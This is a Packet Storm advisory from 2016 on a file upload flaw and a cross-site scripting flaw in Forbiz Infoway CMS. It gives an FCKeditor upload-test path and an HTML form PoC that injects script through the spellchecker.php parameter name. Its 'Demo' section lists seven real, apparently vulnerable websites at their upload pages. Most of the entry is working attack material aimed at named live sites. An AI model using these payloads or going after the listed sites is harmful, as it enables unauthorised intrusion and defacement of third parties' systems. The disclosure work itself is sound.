Forbiz Infoway CMS File Upload / Cross Site Scripting

2016-10-07T00:00:00
ID PACKETSTORM:139016
Type packetstorm
Reporter M.R.S.L.Y
Modified 2016-10-07T00:00:00

Description

                                        
                                            `================================================================================  
Forbiz Infoway CMS - File Upload / Cross Site Scripting  
================================================================================  
# Vendor Homepage: http://www.forbiz.co.in/  
# Date: 07/10/2016  
# Author: Ashiyane Digital Security Team  
# Verion: All  
================================================================================  
# PoC of File Upload (FCKeditor):  
Vulnerable page :   
http://localhost/cms/editor/filemanager/connectors/uploadtest.html  
Path of file : http://localhost/images/fck_editor_images/file.txt  
  
  
# PoC of Xss :  
<html>  
<form   
action="http://chakraayurvedicresort.com/cms/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"   
method="post">  
<input type="hidden"   
name="textinputs[1</script><script>alert(123);//</script>]" value="test">  
<input type="submit" value="xss">  
</form>  
  
# Demo :  
http://www.chakraayurvedicresort.com/cms/editor/filemanager/connectors/uploadtest.html  
http://www.seshansacademy.com/cms/editor/filemanager/connectors/uploadtest.html  
http://aiim.net.in/cms/editor/filemanager/connectors/uploadtest.html  
http://www.swiftport.net/cms/editor/filemanager/connectors/uploadtest.html  
http://www.hrdcnainital.ac.in/cms/editor/filemanager/connectors/uploadtest.html  
http://www.svgmindia.com/cms/editor/filemanager/connectors/uploadtest.html  
http://www.attukalshoppingcomplex.com/cms/editor/filemanager/connectors/uploadtest.html   
  
================================================================================  
# Discovered By : M.R.S.L.Y  
================================================================================  
`